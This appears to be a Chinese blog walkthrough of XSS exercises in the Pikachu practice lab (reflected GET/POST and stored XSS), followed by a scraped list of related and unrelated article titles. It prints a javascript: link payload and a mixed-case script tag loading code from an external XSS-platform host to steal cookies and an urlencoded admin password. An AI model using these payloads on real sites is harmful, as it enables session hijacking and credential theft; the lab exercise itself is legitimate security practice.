pikachu

反射型xss(get)

在message后输入

<a href="javascript:alert(1)">XSS Test</a>

即可在who is后面看到按钮:XSS Test,点击即可显示出alert的内容1;

反射型xss(post)

界面是输入用户名和密码,尝试将这两栏输入JavaScript弹窗命令,不论是只输入一个表单,还是两个都输入,都没有产生反应,按提示登录后,再尝试提交js的弹窗命令:

发现了提交的request中有cookie,message依然是urlencode的js弹窗命令:

这次post提交就可以看到提交后可以看到弹框命令可以执行了:

在XSS平台中截取下图黄色部分代码提交post请求,代码:

<sCRiPt sRC=//uj.ci/pl5C></sCrIpT>

查看项目内容也一样得到cookie,cookie中的admin以及pw后的urlencode编码的密码就可以被盗取:

储存型xss

提交js命令后依然可以弹出命令

储存型xss

提交js命令后依然可以弹出命令

pikachu反射型xss(get、post)、储存型xss相关推荐

  1. PhpMyWind储存型XSS漏洞练习(CVE-2017-12984)

    0x01 介绍 又是一款开源CMS内容管理系统PhpMyWind,在小于等于5.4版本中存在储存型XSS漏洞.如下图所示,这个就是发生储存型XSS漏洞的代码 0x02 演示 1.第一张图是客户留言时, ...

  2. XSS注入(1)-两个简单测试理解反射型xss注入和存储型xss注入

    XSS注入(1)-两个例子理解反射型xss注入和存储型xss注入 XSS全称 Cross Site Script,为使与css语言重名,所以我们将其称为xss跨站脚本攻击.它指的是恶意攻击者往Web页 ...

  3. 记一次挖掘115网盘反射型xss,08xss的储存型xss

    记一次对115分站简单绕过过滤继续实现xss,08xss平台也中枪!! 115反射型xss url:http://115.qiye.115.com/disk/?ac=select_public_fil ...

  4. php抓取%3ctr%3e中指定的数据,程氏舞曲CMSPHP3.0 储存型xss getshell

    Author:roker 这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题 官网已经修补了,所以重新下了源码 因为 后台登入 还需要认证码 所以 注入就没看了. 存在 xs ...

  5. 【漏洞学习——XSS】乐视网存储型XSS

    漏洞细节 http://ui.letv.com/ http://bbs.wangjiu.com/forum.php 发贴插入ed2k://|file|test|'+alert(document.coo ...

  6. 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录

    XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一.跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发 ...

  7. xss攻击解决方案php项目,php 过滤存储型XSS攻击,_PHP_ 少侠科技

    详细内容 最近做的项目被测试测出了存在存储型XSS,至此记录一下,问题出在了 input 框 :payload:"a" οnclick=alert(1)> 也做了一些XSS过 ...

  8. dvwa_xss_储存型

    文章目录 一.xss储存型概念 二.储存型图片演示 三.代码分析 四.dvwa_储存型_演练 五.总结 一.xss储存型概念 黑客发现个人信息或发表文章,等,处存在xss漏洞(并且是储存在数据库中), ...

  9. XSS攻击,XSS预防(前端安全),XSS练习

    XSS攻击,XSS预防(前端安全),XSS练习 文章目录 XSS攻击,XSS预防(前端安全),XSS练习 1:什么是XSS 2:XSS 分类 2.1:存储型 XSS 2.2:反射型 XSS 2.3:D ...

最新文章

  1. tcp协议不具备的功能是_TCP协议的状态深度解析,你知道的和不知道的都在这篇文章(干货)...
  2. SAP MM 创建退货类型的公司间STO,报错 -No delivery type for returns processing assigned to item 00010-
  3. python3.6安装包多大_win10下Python3.6安装、配置以及pip安装包教程
  4. 一步步开发自己的博客 .NET版(5、Lucenne.Net 和 必应站内搜索)
  5. 例子---PHP与Form表单之一
  6. 也谈虚拟化的服务器选型,以及性能考虑
  7. idea编译android项目,IDEA创建Android项目并反编译APK
  8. IOMeter安装以及测试
  9. mysql数据库工资管理系统_数据库课程设计—企业工资管理系统(java版完整代码).doc...
  10. python 3des加密_python3使用3des加密
  11. Python——集合运算
  12. 计算机英语四六级成绩查询,CET成绩查询常见问题答疑-99宿舍
  13. 为什么说人间值得,因为有这么多美好让我们留恋。金秋十月初九于指南山村 。...
  14. DLP迈向NG DLP的进化之路
  15. 最值得用的五款 chrome 插件 Vimium momentum The Great Suspender等 附下载地址。
  16. 网易邮箱注册界面设计 html
  17. webservice报错Message part refundRequest was not recognized. (Does it exist in service WSDL?)
  18. 什么是CPS?数字孪生技术在工业4.0该如何应用?ThingJS
  19. 【机器学习基础】Scipy(科学计算库) 手把手手把手
  20. 如何查询网站服务器类型

热门文章

  1. 2020计算机统考题,2020年7月网络教育统考计算机应用基础模拟题试卷9
  2. fatal: unable to access ‘https://github.com/xxx‘: GnuTLS recv error (-110): The TLS connection...
  3. 虚拟机终端输入git clone https://github.com/.......git无反应,或者出现fatal: 无法访问 ‘https://github.com/.....
  4. 餐饮行业新媒体营销玩法
  5. 2)MyBatis2(增删改查)
  6. 使用numpy中的matmul方法计算矩阵乘法
  7. 用HTML写一段表白代码
  8. 分布式系统中的通信机制
  9. BS EN 2825 烟雾密度测定
  10. TCP 报文各字段解析